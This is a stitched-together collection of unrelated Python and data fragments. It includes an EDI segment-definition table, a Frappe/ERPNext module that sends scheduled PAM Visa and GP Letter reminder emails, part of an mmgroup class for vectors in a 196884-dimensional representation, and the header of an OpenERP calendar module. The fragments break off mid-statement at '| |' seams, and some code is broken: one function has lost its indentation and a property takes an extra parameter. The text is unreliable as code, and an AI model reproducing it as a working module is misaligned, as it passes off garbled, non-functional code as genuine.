['EB05', 'C', 50,'AN'],
['EB06', 'C', 2,'AN'],
['EB07', 'C', 15,'R'],
['EB08', 'C', 10,'R'],
['EB09', 'C', (2,2),'AN'],
['EB10', 'C', 15,'R'],
['EB11', 'C', 1,'AN'],
['EB12', 'C', 1,'AN'],
['EB13', 'C', [
['EB13.01', 'M', (2,2),'AN'],
['EB13.02', 'M', 30,'AN'],
['EB13.03', 'C', (2,2),'AN'],
['EB13.04', 'C', (2,2),'AN'],
['EB13.05', 'C', (2,2),'AN'],
['EB13.06', 'C', (2,2),'AN'],
['EB13.07', 'C', 80,'AN'],
]],
],
'EC': [
['BOTSID', 'M', 3,'AN'],
['EC01', 'C', (2,3),'AN'],
['EC02', 'C', (2,3),'AN'],
['EC03', 'C', (2,3),'AN'],
['EC04', 'C', 10,'R'],
['EC05', 'C', 1,'AN'],
['EC06', 'C', (4,6),'AN'],
],
'ED': [
['BOTSID', 'M', 3,'AN'],
['ED01', 'M', 4,'AN'],
['ED02', 'M', 10,'AN'],
['ED03', 'M', 1,'AN'],
['ED04', 'C', 16,'AN'],
['ED05', 'C', 50,'AN'],
['ED06', 'C', 6,'R'],
['ED07', 'C', (6,6),'DT'],
],
'EFI': [
['BOTSID', 'M', 3,'AN'],
['EFI01', 'M', (2,2),'AN'],
['EFI02', 'C', 264,'AN'],
['EFI03', 'C', (2,2),'AN'],
['EFI04', 'C', 30,'AN'],
['EFI05', 'C', 30,'AN'],
['EFI06', 'C', 30,'AN'],
['EFI07', 'C', 30,'AN'],
['EFI08', 'C', 30,'AN'],
['EFI09', 'C', 30,'AN'],
['EFI10', 'C', (2,2),'AN'],
['EFI11', 'C', 64,'AN'],
['EFI12', 'C', | |
# -*- coding: utf-8 -*-
# encoding: utf-8
from __future__ import unicode_literals
import itertools
from one_fm.api.notification import create_notification_log
from frappe import _
import frappe, os, erpnext, json, math
from frappe.model.document import Document
from frappe.utils import get_site_base_path
from erpnext.hr.doctype.employee.employee import get_holiday_list_for_employee
from frappe.utils.data import flt, nowdate, getdate, cint
from frappe.utils.csvutils import read_csv_content
from frappe.utils import (
cint, cstr, flt, rounded, nowdate, comma_and, date_diff, getdate,
formatdate ,get_url, get_datetime, add_to_date, time_diff, get_time,
time_diff_in_hours
)
from datetime import tzinfo, timedelta, datetime
from dateutil import parser
from datetime import date
from frappe.model.naming import set_name_by_naming_series
from erpnext.hr.doctype.leave_ledger_entry.leave_ledger_entry import (
expire_allocation, create_leave_ledger_entry
)
from dateutil.relativedelta import relativedelta
from frappe.utils import (
cint, cstr, date_diff, flt, formatdate, getdate, get_link_to_form,
comma_or, get_fullname, add_years, add_months, add_days,
nowdate,get_first_day,get_last_day, today
)
import datetime
from datetime import datetime, time
from frappe import utils
import pandas as pd
from erpnext.hr.utils import get_holidays_for_employee
from one_fm.processor import sendemail
from frappe.desk.form import assign_to
from one_fm.one_fm.payroll_utils import get_user_list_by_role
from frappe.core.doctype.user.user import extract_mentions
from frappe.desk.doctype.notification_log.notification_log import get_title, get_title_html
def check_upload_original_visa_submission_reminder2():
    """
    Scheduled escalation: PAM Visas whose original-visa upload is still
    pending after reminder 2 are marked 'No Response', their reminder flag
    is re-armed, and the GRD operator is emailed again.
    """
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_done=1")
    for visa_name in pending:
        visa = frappe.get_doc("PAM Visa", visa_name)
        visa.upload_original_visa_reminder2_done = 0
        visa.upload_original_visa_status = 'No Response'
        visa.upload_original_visa_reminder2 = frappe.utils.now()
        visa.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; consider get_url() instead
        page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        message = frappe.render_template(
            'one_fm/templates/emails/pam_visa.html',
            context={"page_link": page_link, "approval": 'Operator'}
        )
        sender = frappe.get_value("Email Account", filters={"default_outgoing": 1}, fieldname="email_id") or None
        recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        sendemail(sender=sender, recipients=recipient,
                  content=message, subject="PAM Visa Reminder", delayed=False)
def check_upload_original_visa_submission_reminder1():
    """Send the first 'upload original visa' reminder and arm reminder 2.

    Emails the GRD operator (cc supervisor) and flips the reminder flags
    so the next sweep escalates instead of re-sending this one.
    """
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_start=1")
    for visa_name in pending:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.upload_original_visa_reminder1 = frappe.utils.now()
        doc.upload_original_visa_reminder2_start = 0
        doc.upload_original_visa_reminder2_done = 1
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        supervisor = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
        sendemail(sender=outgoing, recipients=operator, content=body,
                  subject="PAM Visa Reminder", cc=supervisor, delayed=False)
def check_upload_original_visa_submission_daily():
    """Daily sweep: arm reminder 2 for approved PAM Visas whose original
    visa document has not been uploaded yet."""
    for visa_name in frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_start=0 and upload_original_visa_reminder2_done=0 and upload_original_visa_status!='No Response' and pam_visa_approval_submitted=1"):
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.upload_original_visa_reminder2_start = 1
        doc.save(ignore_permissions=True)
def check_pam_visa_approval_submission_seven():
    """Mark PAM Visa approval requests that ignored reminder 2 as
    'No Response' and notify the GRD operator."""
    unanswered = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_done=1")
    for visa_name in unanswered:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_approval_reminder2_done = 0
        doc.pam_visa_approval_status = 'No Response'
        doc.pam_visa_approval_reminder2 = frappe.utils.now()
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        sendemail(sender=outgoing, recipients=operator,
                  content=body, subject="PAM Visa Reminder", delayed=False)
def check_pam_visa_approval_submission_six_half():
    """Send the first PAM Visa approval reminder (operator, cc supervisor)
    and arm the escalation flag for the next sweep."""
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_start=1")
    for visa_name in pending:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_approval_reminder1 = frappe.utils.now()
        doc.pam_visa_approval_reminder2_start = 0
        doc.pam_visa_approval_reminder2_done = 1
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        supervisor = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
        sendemail(sender=outgoing, recipients=operator, content=body,
                  subject="PAM Visa Reminder", cc=supervisor, delayed=False)
def check_pam_visa_approval_submission_daily():
    """Daily sweep: arm the reminder-2 flag on approved PAM Visas whose
    approval form has not been submitted yet."""
    # NOTE(review): status='Apporved' looks like a typo for 'Approved'; if
    # the doctype stores the correctly spelled value this query never
    # matches a row — confirm against the PAM Visa status options before
    # changing the literal (the DB may actually contain the misspelling).
    pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_start=0 and pam_visa_approval_reminder2_done=0 and pam_visa_approval_status!='No Response' and status='Apporved'")
    for pam_visa in pam_visas:
        pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
        pam_visa_doc.pam_visa_approval_reminder2_start = 1
        pam_visa_doc.save(ignore_permissions = True)
def check_upload_tasriah_reminder2():
    """Mark tasriah-upload requests that ignored reminder 2 as
    'No Response' and notify the GRD operator."""
    unanswered = frappe.db.sql_list("select name from `tabPAM Visa` where upload_tasriah_submitted=0 and upload_tasriah_reminder2_done=1")
    for visa_name in unanswered:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.upload_tasriah_reminder2_done = 0
        doc.upload_tasriah_status = 'No Response'
        doc.upload_tasriah_reminder2 = frappe.utils.now()
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        sendemail(sender=outgoing, recipients=operator,
                  content=body, subject="PAM Visa Reminder", delayed=False)
def check_upload_tasriah_reminder1():
    """Send the first tasriah-upload reminder (operator, cc supervisor)
    and arm the escalation flag for the next sweep."""
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where upload_tasriah_submitted=0 and upload_tasriah_reminder2_start=1")
    for visa_name in pending:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.upload_tasriah_reminder1 = frappe.utils.now()
        doc.upload_tasriah_reminder2_start = 0
        doc.upload_tasriah_reminder2_done = 1
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        supervisor = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
        sendemail(sender=outgoing, recipients=operator, content=body,
                  subject="PAM Visa Reminder", cc=supervisor, delayed=False)
def check_upload_tasriah_submission_nine():
    """Arm the tasriah reminder-2 flag once two days have elapsed since
    the supervisor reminder was sent."""
    for visa_name in frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted_supervisor=1 and upload_tasriah_submitted=0 and upload_tasriah_reminder2_start=0 and upload_tasriah_reminder2_done=0 and upload_tasriah_status!='No Response'"):
        doc = frappe.get_doc("PAM Visa", visa_name)
        due_date = add_days(doc.pam_visa_reminder_supervisor, 2)
        days_overdue = date_diff(frappe.utils.now(), due_date)
        if days_overdue >= 0:
            doc.upload_tasriah_reminder2_start = 1
            doc.save(ignore_permissions=True)
def check_grp_supervisor_submission_daily():
    """Daily reminder to the GRD supervisor for PAM Visas submitted by
    the operator but not yet submitted by the supervisor."""
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=1 and pam_visa_submitted_supervisor=0")
    for visa_name in pending:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_reminder_supervisor = frappe.utils.now()
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Supervisor'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        supervisor = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
        sendemail(sender=outgoing, recipients=supervisor,
                  content=body, subject="PAM Visa Reminder", delayed=False)
def check_grp_operator_submission_four_half():
    """Mark operator submissions that ignored reminder 2 as 'No Response'
    and notify the GRD operator, cc the supervisor."""
    unanswered = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_done=1")
    for visa_name in unanswered:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_reminder2_done = 0
        doc.grd_operator_status = 'No Response'
        doc.pam_visa_reminder2 = frappe.utils.now()
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        supervisor = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
        sendemail(sender=outgoing, recipients=operator, content=body,
                  subject="PAM Visa Reminder", cc=supervisor, delayed=False)
def check_grp_operator_submission_four():
    """Send the first operator-submission reminder and arm reminder 2."""
    pending = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_start=1")
    for visa_name in pending:
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_reminder1 = frappe.utils.now()
        doc.pam_visa_reminder2_start = 0
        doc.pam_visa_reminder2_done = 1
        doc.save(ignore_permissions=True)
        # NOTE(review): hard-coded intranet host; presumably should use get_url()
        link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(visa_name)
        body = frappe.render_template('one_fm/templates/emails/pam_visa.html',
                                      context={"page_link": link, "approval": 'Operator'})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        operator = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
        sendemail(sender=outgoing, recipients=operator,
                  content=body, subject="PAM Visa Reminder", delayed=False)
def check_grp_operator_submission_daily():
    """Daily sweep: arm the reminder-2 flag on PAM Visas the GRD operator
    has not submitted yet."""
    for visa_name in frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_start=0 and pam_visa_reminder2_done=0 and grd_operator_status!='No Response'"):
        doc = frappe.get_doc("PAM Visa", visa_name)
        doc.pam_visa_reminder2_start = 1
        doc.save(ignore_permissions=True)
def send_gp_letter_attachment_reminder2():
    """Second upload reminder to the travel agent, sent 3 days after
    reminder 1 when the GP letter attachment is still missing."""
    requests = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
    for request_name in requests:
        request_doc = frappe.get_doc("GP Letter Request", request_name)
        # Fire exactly once: reminder 1 sent, reminder 2 not yet stamped.
        if not request_doc.upload_reminder1 or request_doc.upload_reminder2:
            continue
        due = add_days(request_doc.upload_reminder1, 3)
        if date_diff(getdate(nowdate()), due) < 0:
            continue
        grd_name = frappe.db.get_single_value('GP Letter Request Setting', 'grd_name')
        grd_number = frappe.db.get_single_value('GP Letter Request Setting', 'grd_number')
        body = frappe.render_template('one_fm/templates/emails/gp_letter_attachment_reminder.html',
                                      context={"candidates": request_doc.gp_letter_candidates,
                                               "grd_name": grd_name, "grd_number": grd_number})
        outgoing = frappe.get_value("Email Account", filters={"default_outgoing": 1},
                                    fieldname="email_id") or None
        agent = frappe.db.get_single_value('GP Letter Request Setting', 'travel_agent_email')
        grd_email = frappe.db.get_single_value('GP Letter Request Setting', 'grd_email')
        sendemail(sender=outgoing, recipients=agent, content=body,
                  subject="GP Letter Upload Reminder", cc=grd_email, delayed=False)
        request_doc.upload_reminder2 = frappe.utils.now()
        request_doc.save(ignore_permissions=True)
def send_gp_letter_attachment_reminder3():
    """Third upload reminder to the travel agent, sent 4 hours after
    reminder 2 when the GP letter attachment is still missing."""
    # NOTE(review): add_to_date and get_datetime are not in the
    # frappe.utils import list visible at the top of this chunk — confirm
    # they are imported elsewhere in the file, otherwise this raises
    # NameError at runtime.
    gp_letters_request = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
    for gp_letter_request in gp_letters_request:
        gp_letter_doc = frappe.get_doc("GP Letter Request", gp_letter_request)
        # Fire exactly once: reminder 2 sent, reminder 3 not yet stamped.
        if gp_letter_doc.upload_reminder2 and not gp_letter_doc.upload_reminder3:
            after_four_hour = add_to_date(gp_letter_doc.upload_reminder2, hours=4)
            if get_datetime(frappe.utils.now())>=get_datetime(after_four_hour):
                grd_name = frappe.db.get_single_value('GP Letter Request Setting', 'grd_name')
                grd_number = frappe.db.get_single_value('GP Letter Request Setting', 'grd_number')
                msg = frappe.render_template('one_fm/templates/emails/gp_letter_attachment_reminder.html', context={"candidates": gp_letter_doc.gp_letter_candidates, "grd_name": grd_name, "grd_number": grd_number})
                sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
                recipient = frappe.db.get_single_value('GP Letter Request Setting', 'travel_agent_email')
                cc = frappe.db.get_single_value('GP Letter Request Setting', 'grd_email')
                sendemail(sender=sender, recipients= recipient,
                          content=msg, subject="GP Letter Upload Reminder" ,cc=cc, delayed=False)
                gp_letter_doc.upload_reminder3 = frappe.utils.now()
                gp_letter_doc.save(ignore_permissions = True)
def send_gp_letter_attachment_no_response():
gp_letters_request = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
for gp_letter_request in gp_letters_request:
gp_letter_doc = frappe.get_doc("GP Letter Request", gp_letter_request)
if gp_letter_doc.upload_reminder3 and not gp_letter_doc.upload_reminder4:
gp_letter_doc.upload_reminder4 = frappe.utils.now()
gp_letter_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/GP Letter Request/" + gp_letter_request
# page_link = get_url("/desk#Form/GP | |
API reference*.
"""
# Concrete vector class and short name of this representation space.
vector_type = MMVector
space_name = "MV"
# Error codes returned by the C routine mm_aux_check_mmv(), mapped to
# human-readable messages (used by the check() method below).
check_errors = {
    -1: "Bad input value p",
    -2: "A one bit outside a field has been found",
    -3: "A subfield has an illegal nonzero entry at index >= 24",
    -4: "Illegal nonzero diagonal entry",
    -5: "Symmetric part of vector is not symmetric",
}
def __init__(self):
    """Create a 196884-dimensional representation of the monster

    All calculations are done modulo the odd number p
    """
    # No per-instance state: the space object acts as a stateless namespace
    # of vector operations; the characteristic p travels with each vector.
    pass
@property
def mm(self, p):
    """Return module object mmgroup.mm<p> for characteristic p"""
    # NOTE(review): a property getter is invoked with `self` only, so the
    # extra parameter `p` makes plain attribute access raise TypeError.
    # Either the @property decorator or the parameter looks wrong —
    # confirm intended usage before relying on this accessor.
    characteristics()  # presumably populates the mm_op table lazily — verify
    return mm_op[p]
#######################################################################
# Creating vectors
#######################################################################
def zero(self, p):
    """Return the zero vector of this space modulo ``p``."""
    zero_vector = MMVector(p, 0)
    return zero_vector
def copy_vector(self, v1):
    """Return an independent copy of vector ``v1`` from this space."""
    assert v1.space == self
    duplicate = MMVector(v1.p, 0)
    np.copyto(duplicate.data, v1.data)
    return duplicate
def set_rand_uniform(self, v1, seed = None):
    """Fill ``v1`` with uniformly distributed random coordinates.

    ``seed`` seeds the random generator.  The current version supports
    the default seed only, which mixes entropy from the operating
    system and the clock.  Returns ``v1``.
    """
    mm_aux_random_mmv(v1.p, v1.data, rand_get_seed(seed))
    return v1
#######################################################################
# Obtaining and setting components via sparse vectors
#######################################################################
def getitems_sparse(self, v1, a_indices):
    """Read components of ``v1`` selected by a sparse index array.

    ``v1`` must belong to this space and ``a_indices`` must be a
    one-dimensional numpy array of dtype np.uint32 holding sparse
    coordinates.  The corresponding coordinate of ``v1`` (nonnegative
    and < 256) is written into each entry of ``a_indices`` in place;
    zero entries are ignored.  Returns the updated array.
    """
    n_entries = len(a_indices)
    if n_entries:
        mm_aux_mmv_extract_sparse(v1.p, v1.data, a_indices, n_entries)
    return a_indices
def additems_sparse(self, v, a_indices):
    """Add a sparse vector to ``v`` in place.

    ``a_indices`` is a numpy array of dtype numpy.uint32 encoding a
    vector v2 in sparse representation; this computes v = v + v2 and
    returns ``v``, a standard vector of this space.
    """
    n_entries = len(a_indices)
    if n_entries:
        mm_aux_mmv_add_sparse(v.p, a_indices, n_entries, v.data)
    return v
def setitems_sparse(self, v, a_indices):
    """Assign selected components of ``v`` from a sparse array.

    Arguments are as in method getitems_sparse().  The coordinates of
    ``v`` addressed by ``a_indices`` are set to the values carried in
    those sparse entries; ``a_indices`` itself is left unchanged.
    """
    n_entries = len(a_indices)
    if n_entries:
        mm_aux_mmv_set_sparse(v.p, v.data, a_indices, n_entries)
    return v
#######################################################################
# Conversion from and to to sparse representation
#######################################################################
def as_sparse(self, v1):
    """Return vector ``v1`` as a sparse numpy array of np.uint32 entries.

    The C routine fills a maximal-size buffer and reports how many
    sparse entries it actually produced; only that prefix is returned.
    """
    sparse_buffer = np.zeros(196884, dtype=np.uint32)
    n_entries = mm_aux_mmv_to_sparse(v1.p, v1.data, sparse_buffer)
    return sparse_buffer[:n_entries]
#######################################################################
# Vector operations
#######################################################################
def iadd(self, v1, v2):
    """Add vector ``v2`` to ``v1`` in place and return ``v1``.

    Raises ValueError when the two vectors live over different
    characteristics (moduli), since coordinate-wise addition is only
    defined modulo a common p.
    """
    if v1.p != v2.p:
        # Fixed typo in the error message: 'differnt' -> 'different'.
        raise ValueError("Cannot add vectors modulo different numbers")
    v1.ops.op_vector_add(v1.data, v2.data)
    return v1
def imul_scalar(self, v1, a):
    """Multiply vector ``v1`` in place by scalar ``a`` (taken mod v1.p)."""
    reduced_scalar = a % v1.p
    v1.ops.op_scalar_mul(reduced_scalar, v1.data)
    return v1
#######################################################################
# Group operation
#######################################################################
def imul_group_word(self, v1, g):
    """Return product v1 * g of vector v1 and group word g.

    v1 may be destroyed.  This method is called for elements v1 of the
    space 'self' and for elements g of the group 'self.group' only.
    """
    # Guard clause: reject anything that is not a group word up front.
    if not isinstance(g, AbstractMMGroupWord):
        raise TypeError("Multiplicator for MM vector must be int or in MM group")
    work = mm_vector(v1.p)
    word_data = g.mmdata
    v1.ops.op_word(v1.data, word_data, len(word_data), 1, work)
    return v1
def vector_mul_exp(self, v1, g, e, break_g = False):
    """Compute product v1 * g**e of vector v1 and group word g.

    Here v1 is a vector in this space, e is an integer, g is a
    group element, and v1 is replaced by v1 * g**e.

    This method should be called for elements v1 of the space
    'self' and for elements g of the group 'self.group' only.

    If break_g is True, each factor g is multiplied with v1
    separately. Otherwise, the expression g**e may be
    optimized. This option is mainly for benchmarking.

    After applying this function to vector v1, the vector
    v1 has an attribute v1.last_timing containing the run
    time of the C part of this operation in seconds.
    """
    work = mm_vector(v1.p)
    assert v1.space == self
    # Exponent must fit into a signed 32-bit int for the C routine.
    assert -1 << 31 < e < 1 << 31
    assert isinstance(g, MM0)
    length = g.length
    if break_g:
        # Append marker 0x70000000 so the C routine applies the factors
        # of g one by one instead of optimizing the power g**e.
        g._extend(length + 1)
        g._data[length] = 0x70000000
        length += 1
    t_start = time.perf_counter()
    v1.ops.op_word(v1.data, g._data, length, e, work)
    # Wall-clock duration of the C call, kept for benchmarking.
    v1.last_timing = time.perf_counter() - t_start
    return v1
#######################################################################
# Checking equality
#######################################################################
def equal_vectors(self, v1, v2):
    """Return True iff vectors v1 and v2 are equal.

    Called for elements v1 and v2 of the space 'self' only; vectors
    over different characteristics are never considered equal.
    """
    same_modulus = v1.p == v2.p
    return same_modulus and v1.ops.op_compare(v1.data, v2.data) == 0
#######################################################################
# Conversion from and to byte format
#######################################################################
def as_bytes(self, v1):
    """Return vector ``v1`` as a byte array.

    The result is a numpy array with dtype = uint8 and shape (196884,).
    """
    out = np.zeros(196884, dtype=np.uint8)
    mm_aux_mmv_to_bytes(v1.p, v1.data, out)
    return out
def from_bytes(self, p, b):
    """Construct a vector from a byte array.

    ``b`` is an array-like object representing a one-dimensional array
    of 196884 integers (as in numpy), listed in the linear order
    described by method ``tuple_to_index``.  The integers are taken
    modulo the characteristic ``p`` of the space.  Returns the
    corresponding vector as an instance of class |MMVector|.
    Raises TypeError for a wrong shape or length.
    """
    raw = np.array(b, dtype=np.int32)
    if raw.ndim != 1:
        raise TypeError("Bad shape of byte data vector")
    if raw.shape[0] != 196884:
        raise TypeError("Bad length of byte data vector")
    reduced = np.array(raw % p, dtype=np.uint8)
    result = self.zero(p)
    mm_aux_bytes_to_mmv(p, reduced, result.data)
    return result
#######################################################################
# Checking and reducing a vector
#######################################################################
def check(self, v1):
    """Check vector ``v1`` for internal consistency.

    Raises MemoryError when the underlying buffer is corrupted and
    ValueError when the C-level check mm_aux_check_mmv() reports an
    error; the specific error text is printed before raising, as in
    the original implementation.
    """
    if len(v1.data) != v1.ops.MMV_INTS + 1:
        raise MemoryError("MM vector has wrong length")
    # The last word is a sentinel that must never be overwritten.
    if v1.data[-1] != PROTECT_OVERFLOW:
        raise MemoryError("Buffer overflow in MM vector detected")
    result = mm_aux_check_mmv(v1.p, v1.data)
    if not result:
        return
    # dict.get() with a default replaces the former bare 'except:' that
    # silently swallowed every exception around the table lookup.
    err = self.check_errors.get(result, "Unknown error %d in MM vector" % result)
    print("\n%s!\n" % err)
    raise ValueError("Error in MM vector")
def reduce(self, v1):
    """Convert vector v1 to a unique reduced form"""
    # Delegates to the C routine, which normalizes all coordinates of
    # v1 modulo v1.p in place; returns v1 for chaining.
    mm_aux_reduce_mmv(v1.p, v1.data)
    return v1
#######################################################################
# Conversion between tags and indices
#######################################################################
@classmethod
def tuple_to_index(cls, tag, i0 = -1, i1 = -1):
r"""Convert tuple ``(tag, i0, i1)`` to a linear index
Remarks:
The tuple ``('D', i0)`` is accepted as a shorthand for
``('A', i0,i0)``.
A tuple ``('E', i0)`` means a linear index ``i0``, i.e.
this method returns ``i0`` on input ``('E', i0)``, for
``0 <= i0 < 196884``.
If ``tag`` is an instance of class |MMVector|, which is
a nonzero multiple of a basis vector, then the linear index
corresponding to that basis vector is returned.
"""
i = 0
if isinstance(tag, str) and len(tag) == 1:
t = TAGS.find(tag)
if t >= 1 and 0 <= i0 < 2048 and 0 <= i1 < 64:
i = (t << 25) + (i0 << 14) + (i1 << 8)
elif tag == "E" and 0 <= i0 < 196884:
return i0
elif tag == "D" and 0 <= i0 < 24:
i = (1 << 25) + (i0 << 14) + (i0 << 8)
elif isinstance(tag, MMVector):
sp = tag.as_sparse()
if len(sp) == 1:
i = sp[0]
else:
err = "MM vector is not multiple of basis vector"
raise ValueError(err)
else:
raise TypeError("Cannot convert object to MM vector index")
i_ext = mm_aux_index_sparse_to_extern(i)
if 0 <= i_ext < 196884:
return i_ext
err = "Could not convert tuple with tag %s to MM vector index"
| |
<filename>openerp/addons/base_calendar/base_calendar.py
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta, date
from dateutil import parser
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
from openerp.service import web_services
from openerp.tools.translate import _
import pytz
import re
import time
from operator import itemgetter
from openerp import tools, SUPERUSER_ID
# Month number -> English month name, used when formatting event dates.
months = {
    1: "January", 2: "February", 3: "March", 4: "April",
    5: "May", 6: "June", 7: "July", 8: "August", 9: "September",
    10: "October", 11: "November", 12: "December"
}
def get_recurrent_dates(rrulestring, exdate, startdate=None, exrule=None):
    """
    Get recurrent dates based on Rule string considering exdate and start date.
    @param rrulestring: rulestring
    @param exdate: list of exception dates for rrule
    @param startdate: startdate for computing recurrent dates
    @param exrule: optional exception rule string excluded from the result
    @return: list of recurrent dates
    """
    def todate(date_str):
        # Keep only the digits: stored exdates may carry 'T'/'Z' separators.
        # Raw string avoids the invalid-escape '\d' warning.
        return parser.parse(''.join(re.compile(r'\d').findall(date_str)))

    if not startdate:
        startdate = datetime.now()
    rset = rrule.rrulestr(str(rrulestring), dtstart=startdate, forceset=True)
    # Loop variable renamed so it no longer shadows the imported `date`;
    # use the public exdate() API instead of poking rset._exdate directly.
    for exdate_str in (exdate or []):
        rset.exdate(todate(exdate_str))
    if exrule:
        rset.exrule(rrule.rrulestr(str(exrule), dtstart=startdate))
    return list(rset)
def base_calendar_id2real_id(base_calendar_id=None, with_date=False):
    """
    Convert a "virtual/recurring event id" (type string) into a real event id (type int).
    E.g. virtual/recurring event id is 4-20091201100000, so it will return 4.
    @param base_calendar_id: id of calendar
    @param with_date: if set, also return (start, end) dates derived from the
           virtual id, with `with_date` as the duration in hours
    @return: real event id, or (real_id, start, end) when with_date is set
    """
    if base_calendar_id and isinstance(base_calendar_id, (str, unicode)):
        parts = base_calendar_id.split('-')
        if len(parts) >= 2:
